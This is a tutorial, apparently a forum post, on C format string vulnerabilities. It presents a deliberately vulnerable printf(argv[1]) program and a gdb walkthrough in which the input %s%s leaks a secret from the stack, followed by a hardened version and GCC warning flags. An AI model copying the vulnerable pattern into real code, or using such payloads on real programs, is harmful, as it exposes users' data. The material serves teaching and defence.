Format strings are the strings mainly associated with the printf family of functions (printf, fprintf, etc.); the name basically stands for "print format". These functions accept a variable number of arguments, which the caller pushes onto the stack. As each format specifier in the string is reached, the function pops the next argument from the stack and displays it at that position. E.g., in the following call:

Code:
```c
printf("Aneesh is %s", string);
```

the stack would look like:

Code:
```
==========
Aneesh is %s
==========
string
==========
Other variables
==========
garbage
==========
```

So what the function basically does is: as it finds a format specifier, it simply pops the value from the stack and displays it in the format we specified. This in turn is a vulnerability if not used properly.

Format String Vulnerabilities

In this article we'll only be looking at basic format string vulnerabilities; we'll only be covering how to read data off the stack.

The vulnerable program we are using: format.c

Code:
```c
#include<stdio.h>

int main(int argc,char *argv[])
{
    char pass[] = "I am a secret .... Please dont print me..!!\n";
    printf(argv[1]);
    return(0);
}
```

Compiling:

Code:
```
aneesh@aneesh-laptop:~/articles/C$ gcc format.c -o format -ggdb -fno-stack-protector
format.c: In function ‘main’:
format.c:6: warning: format not a string literal and no format arguments
```

GCC, being very intelligent, warns us not to do this, but there is still software that contains this kind of vulnerability.

Now let's run the program with a basic string:

Code:
```
aneesh@aneesh-laptop:~/articles/C$ ./format Hello
Helloaneesh@aneesh-laptop:~/articles/C$
```

It simply prints out Hello.

Now let's open the app in gdb and examine the stack:

Code:
```
aneesh@aneesh-laptop:~/articles/C$ gdb ./format
GNU gdb (GDB) 7.1-ubuntu
Copyright (C) 2010 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i486-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /home/aneesh/articles/C/format...done.
(gdb)
```

List the program:

Code:
```
(gdb) list
1       #include<stdio.h>
2
3       int main(int argc,char *argv[])
4       {
5           char pass[] = "I am a secret .... Please dont print me..!!\n";
6           printf(argv[1]);
7           return(0);
8       }
(gdb)
```

Place a breakpoint at the start of main:

Code:
```
(gdb) break main
Breakpoint 1 at 0x80483ed: file format.c, line 5.
```

Run the program with some sample string:

Code:
```
(gdb) run hello
Starting program: /home/aneesh/articles/C/format hello

Breakpoint 1, main (argc=2, argv=0xbffff4e4) at format.c:5
5           char pass[] = "I am a secret .... Please dont print me..!!\n";
(gdb) s
6           printf(argv[1]);
(gdb)
```

Examine the data on the stack:

Code:
```
(gdb) x/2s $esp
0xbffff3f0:      "\364?("
0xbffff3f4:      "\364\237\004\b\b\364\377\277\350\202\004\b0\340\021I am a secret .... Please dont print me..!!\n"
```

We notice that we can read the contents of the secret by popping the stack twice with %s. Let's do this and check our solution:

Code:
```
(gdb) run %s%s
Starting program: /home/aneesh/articles/C/format %s%s

Breakpoint 1, main (argc=2, argv=0xbffff4f4) at format.c:5
5           char pass[] = "I am a secret .... Please dont print me..!!\n";
(gdb) s
6           printf(argv[1]);
(gdb) s
???#a secret .... Please dont print me..!!
7           return(0);
```

Boom, we printed the secret. That's all for this tutorial; maybe I'll write some more on format strings, like reading memory from a desired address.
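As an added example (not part of the original post), here is the hardened form of the vulnerable call, printf("%s", argv[1]) instead of printf(argv[1]), together with a small helper that counts how many arguments a user-supplied string would make printf pop; the helper names and the "%s%s" sample input are my own constructions, not code from the tutorial.

```c
#include <stdio.h>
#include <string.h>

/* Count the conversion specifiers printf would act on.  A "%%" pair is a
 * literal percent sign and consumes no argument, so it is skipped. */
int count_conversions(const char *s)
{
    int n = 0;
    for (const char *p = s; *p != '\0'; p++) {
        if (*p != '%')
            continue;
        if (p[1] == '%') {      /* "%%" -> literal '%' */
            p++;
            continue;
        }
        n++;                    /* "%s", "%x", "%08x", "%n", ... */
    }
    return n;
}

/* Returns 1 when using s as a format would make printf pop arguments the
 * caller never pushed (the behaviour the gdb session above shows). */
int would_read_stack(const char *s)
{
    return count_conversions(s) > 0;
}

/* Hardened form of printf(argv[1]): the user string is an argument to a
 * fixed format, so "%s%s" is printed as text.  Returns printf's count. */
int print_user_string(const char *s)
{
    return printf("%s", s);
}

int main(int argc, char *argv[])
{
    /* Constructed input standing in for argv[1]; real runs use argv[1]. */
    const char *input = (argc > 1) ? argv[1] : "%s%s";

    printf("input needs %d arguments; unsafe as a format: %s\n",
           count_conversions(input),
           would_read_stack(input) ? "yes" : "no");
    print_user_string(input);   /* prints the literal text, e.g. "%s%s" */
    putchar('\n');
    return 0;
}
```

Building with -Wformat -Wformat-security makes GCC emit the same kind of warning shown above for any non-literal format, and -Werror=format-security turns it into a build failure.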
Thanks for accepting. The best the viewers can do is to post some comments as feedback... I really need them!!!